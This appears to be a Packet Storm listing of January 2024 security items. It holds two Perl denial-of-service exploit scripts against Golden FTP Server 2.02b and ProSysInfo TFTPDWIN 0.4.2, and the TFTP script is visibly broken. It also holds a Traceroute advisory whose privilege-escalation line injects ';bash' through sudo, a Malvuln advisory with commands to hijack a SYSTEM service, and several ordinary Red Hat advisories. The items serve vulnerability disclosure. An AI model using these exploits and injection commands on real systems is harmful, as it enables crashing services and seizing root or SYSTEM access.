Golden FTP Server version 2.02b remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 21 january 2024# Vendor Homepage:  N/A# Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing# Notification vendor: No reported# Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";$s->send("USER anon\r\n");my $response = <$s>;print $response;$s->send("PASS anon\r\n");$response = <$s>;print $response;$s->send("SYST\r\n");$response = <$s>;print $response;sleep(2);$s->send("PASV " . "\x41"x6631 . "\r\n");sleep(3);$response = <$s>;print $response;$response = <$s>;print $response;print ">>> Sending second payload\n";$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");$response = <$s>;print $response;sleep(2);    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] Golden FTP Server 2.02b - Denied of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

Golden FTP Server 2.02b Denial Of Service

In Traceroute versions 2.0.12 through to 2.1.2, the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts include tcptraceroute, tracepath, traceproto, and traceroute-nanog. Version 2.1.3 addresses this issue.

    Description:In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog.Additional infomation:CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)A local privilege escalation was identified in wrapper scripts provided by the Traceroute for Linux package (https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (;) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command. The scripts require the user to have raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts as opposed to setting "cap_net_raw" capabilities to the binary, or through the use of "icmp dgram" sockets. Thus any user on the local machine can escalate their privileges to root, with the only Attack Requirements (AT in CVSS 4) being that they have sudo root permissions to execute the vulnerable wrapper scripts.The vulnerable wrapper scripts have been provided since version 2.0.12. Distributions such as Debian 12, Fedora 38, Centos 8 and Amazon Linux 2 include these wrapper scripts with default installations.Exploitation:sudo tcptraceroute localhost ";bash"

Traceroute 2.1.2 Privilege Escalation

TrojanSpy Win32 Nivdort malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy Win32 NivdortVulnerability: Insecure Permissions - EoP (SYSTEM) Family: NivdortType: PE32MD5: 15bda00b57e2ed729a45f7cfa62165daVuln ID: MVID-2024-0668Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exeDisclosure: 01/20/2024Description:The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.C:\>cacls C:\pewcvmnvyr\jwgaklb.exeC:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F                          NT AUTHORITY\SYSTEM:(ID)F                          BUILTIN\Users:(ID)R                          NT AUTHORITY\Authenticated Users:(ID)CC:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemExploit/PoC:Open a cmd prompt as standard user:1) unhide the service binary   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe2) rename the service binaryC:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED3) optional replace with your own binary and escalate to SYSTEMC:\Users\norgt>dir \pewcvmnvyr\ Directory of C:\pewcvmnvyr        ..01/14/2024  02:05 AM                 0 dqrpgvnkh01/14/2024  02:05 AM                 6 egjrdhynfm01/14/2024  02:09 AM                 4 nhefhloix01/14/2024  02:05 AM           332,800 PWNED   <================= DONE01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

ProSysInfo TFTP Server TFTPDWIN version 0.4.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 20 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The TFTP server does not correctly handle the amount of data or bytes sent..  
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x520;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $tftp_server,  
    PeerPort => 69,  
    Proto    => 'udp'  
) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;

    print $ftp_socket $buffer;

    close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#     ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service

Red Hat Security Advisory 2024-0310-03 - An update for openssl is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0310.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: openssl security updateAdvisory ID:        RHSA-2024:0310-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0310Issue date:         2024-01-22Revision:           03CVE Names:          CVE-2023-5363====================================================================Summary: An update for openssl is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.Security Fix(es):* openssl: Incorrect cipher key and IV length processing (CVE-2023-5363)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5363References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2243839https://issues.redhat.com/browse/RHEL-15993

Red Hat Security Advisory 2024-0310-03

Red Hat Security Advisory 2024-0273-03 - Red Hat OpenShift Virtualization release 4.12.9 is now available with updates to packages and images that fix several bugs and add enhancements.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0273.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: OpenShift Virtualization 4.12.9 Images security and bug fix updateAdvisory ID:        RHSA-2024:0273-03Product:            OpenShift VirtualizationAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0273Issue date:         2024-01-20Revision:           03CVE Names:          CVE-2023-39325====================================================================Summary: Red Hat OpenShift Virtualization release 4.12.9 is now available with updates to packages and images that fix several bugs and add enhancements.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.This advisory contains OpenShift Virtualization 4.12.9 images.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39325References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2243296https://bugzilla.redhat.com/show_bug.cgi?id=2247667https://issues.redhat.com/browse/CNV-34790

Red Hat Security Advisory 2024-0273-03

Red Hat Security Advisory 2024-0271-03 - There is a moderate update for the the Logging Subsystem 5.8.2. Red Hat OpenShift security update.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0271.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Logging Subsystem 5.8.2 - Red Hat OpenShift security updateAdvisory ID:        RHSA-2024:0271-03Product:            Logging Subsystem for Red Hat OpenShiftAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0271Issue date:         2024-01-20Revision:           03CVE Names:          CVE-2023-26159====================================================================Summary: Moderate: Logging Subsystem 5.8.2 - Red Hat OpenShift security updateRed Hat Product Security has rated this update as having a security impact of moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Logging Subsystem 5.8.2 - Red Hat OpenShiftSecurity Fix(es):* CVE-2023-26159 follow-redirects: Improper Input Validation due to the improper handling of URLs by the url.parse()For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-26159References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2256413https://issues.redhat.com/browse/LOG-4890https://issues.redhat.com/browse/LOG-4912https://issues.redhat.com/browse/LOG-4947https://issues.redhat.com/browse/LOG-4951

Red Hat Security Advisory 2024-0271-03

Red Hat OpenShift security update. Issues addressed include a file disclosure vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0268.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: Logging Subsystem 5.7.10 - Red Hat OpenShift security updateAdvisory ID:        RHSA-2024:0268-03Product:            Logging Subsystem for Red Hat OpenShiftAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0268Issue date:         2024-01-20Revision:           03CVE Names:          CVE-2023-38037====================================================================Summary: Low: Logging Subsystem 5.7.10 - Red Hat OpenShift security updateRed Hat Product Security has rated this update as having a security impact of low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Logging Subsystem 5.7.10 - Red Hat OpenShiftSecurity Fix(es):* CVE-2023-38037 rubygem-activesupport: File Disclosure of Locally Encrypted FilesFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-38037References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2236261https://issues.redhat.com/browse/LOG-4891

Red Hat Security Advisory 2024-0268-03

Red Hat Security Advisory 2024-0204-03 - Red Hat OpenShift Container Platform release 4.14.9 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0204.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.14.9 bug fix and security update  
Advisory ID:        RHSA-2024:0204-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0204  
Issue date:         2024-01-20  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.9 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.9. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:0207

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://issues.redhat.com/browse/OCPBUGS-19431  
https://issues.redhat.com/browse/OCPBUGS-22360  
https://issues.redhat.com/browse/OCPBUGS-22788  
https://issues.redhat.com/browse/OCPBUGS-22895  
https://issues.redhat.com/browse/OCPBUGS-23936  
https://issues.redhat.com/browse/OCPBUGS-24037  
https://issues.redhat.com/browse/OCPBUGS-24640  
https://issues.redhat.com/browse/OCPBUGS-25595  
https://issues.redhat.com/browse/OCPBUGS-25804  
https://issues.redhat.com/browse/OCPBUGS-25997  
https://issues.redhat.com/browse/OCPBUGS-26006  
https://issues.redhat.com/browse/OCPBUGS-26044  
https://issues.redhat.com/browse/OCPBUGS-26065  
https://issues.redhat.com/browse/OCPBUGS-26171  
https://issues.redhat.com/browse/OCPBUGS-26207  
https://issues.redhat.com/browse/OCPBUGS-26214  
https://issues.redhat.com/browse/OCPBUGS-26421

Red Hat Security Advisory 2024-0204-03

Red Hat Security Advisory 2024-0198-03 - Red Hat OpenShift Container Platform release 4.12.47 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0198.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.47 security update  
Advisory ID:        RHSA-2024:0198-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0198  
Issue date:         2024-01-20  
Revision:           03  
CVE Names:          CVE-2022-41723  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.47 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-41723

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2178358  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-17370  
https://issues.redhat.com/browse/OCPBUGS-22091  
https://issues.redhat.com/browse/OCPBUGS-22431  
https://issues.redhat.com/browse/OCPBUGS-22689  
https://issues.redhat.com/browse/OCPBUGS-23184  
https://issues.redhat.com/browse/OCPBUGS-23302  
https://issues.redhat.com/browse/OCPBUGS-23486  
https://issues.redhat.com/browse/OCPBUGS-24256  
https://issues.redhat.com/browse/OCPBUGS-24480  
https://issues.redhat.com/browse/OCPBUGS-25213  
https://issues.redhat.com/browse/OCPBUGS-25214  
https://issues.redhat.com/browse/OCPBUGS-25303  
https://issues.redhat.com/browse/OCPBUGS-25642

Source

Packet Storm